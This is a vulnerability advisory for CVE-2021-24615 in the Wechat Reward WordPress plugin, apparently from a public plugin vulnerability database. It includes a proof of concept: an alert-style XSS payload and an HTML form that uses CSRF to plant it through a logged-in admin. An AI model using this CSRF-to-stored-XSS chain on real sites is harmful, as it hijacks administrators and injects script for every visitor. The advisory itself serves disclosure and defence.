Wechat Reward <= 1.7 – CSRF to Stored Cross-Site Scripting | CVE 2021-24615 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks.

Proof of Concept

Put the following payload in the QR setting: "><script>alert(/XSS/)</script>

The XSS will be triggered in the plugin's setting page, as well as all frontend posts.

via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=upload_wechat_QR" method="POST">
      <input type="hidden" name="wechatQR" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

听雨眠

Submitter

tym

Verified

Yes

WPVDB ID

9d48313b-76d7-4252-9b81-2fdd0373561b

Timeline

Publicly Published

2021-09-20 (about 4 years ago)

Added

2021-09-20 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-05-01

Title

WPML Multilingual CMS 3.6.0 - 4.7.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpml_language_switcher Shortcode

Published

2025-04-21

Title

Ocean Extra < 2.4.7 - Contributor+ Stored XSS via 'ocean_gallery_id'

Published

2023-02-17

Title

Portfolio Slideshow <= 1.13.0 - Contributor+ XSS

Published

2024-09-25

Title

Share This Image < 2.02 - Reflected Cross-Site Scripting

Published

2025-06-09

Title

Elementor Pro < 3.29.1 - Authenticated (Contributor+) Stored Cross-Site Scripting